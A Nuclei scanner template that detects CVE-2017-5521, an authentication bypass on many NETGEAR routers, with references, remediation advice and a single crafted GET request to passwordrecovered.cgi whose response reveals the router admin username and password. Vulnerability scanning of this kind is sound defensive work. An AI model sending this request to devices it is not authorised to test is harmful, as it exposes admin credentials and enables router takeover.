nuclei-templates/http/cves/2017/CVE-2017-5521.yaml

49 lines
1.7 KiB
YAML

id: CVE-2017-5521
info:
name: NETGEAR Routers - Authentication Bypass
author: princechaddha
severity: high
description: |
NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server.
remediation: |
Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.
reference:
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
- http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2017-5521
- https://www.exploit-db.com/exploits/41205/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2017-5521
cwe-id: CWE-200
epss-score: 0.97402
epss-percentile: 0.99898
cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: netgear
product: r6200_firmware
tags: cve,cve2017,auth-bypass,netgear,router,kev
http:
- method: GET
path:
- "{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "right\">Router\\s*Admin\\s*Username<"
- "right\">Router\\s*Admin\\s*Password<"
condition: and
- type: status
status:
- 200
# digest: 490a004630440220750edb6f09ed219eaf6bf019dbd96789c3e1943b223e464df7774f270008b121022009dd15b9b14e42a1bff8eba1e1bcdfff2bdfd19df1b267e641a015e5ae87807f:922c64590222798bb761d5b6d8e72950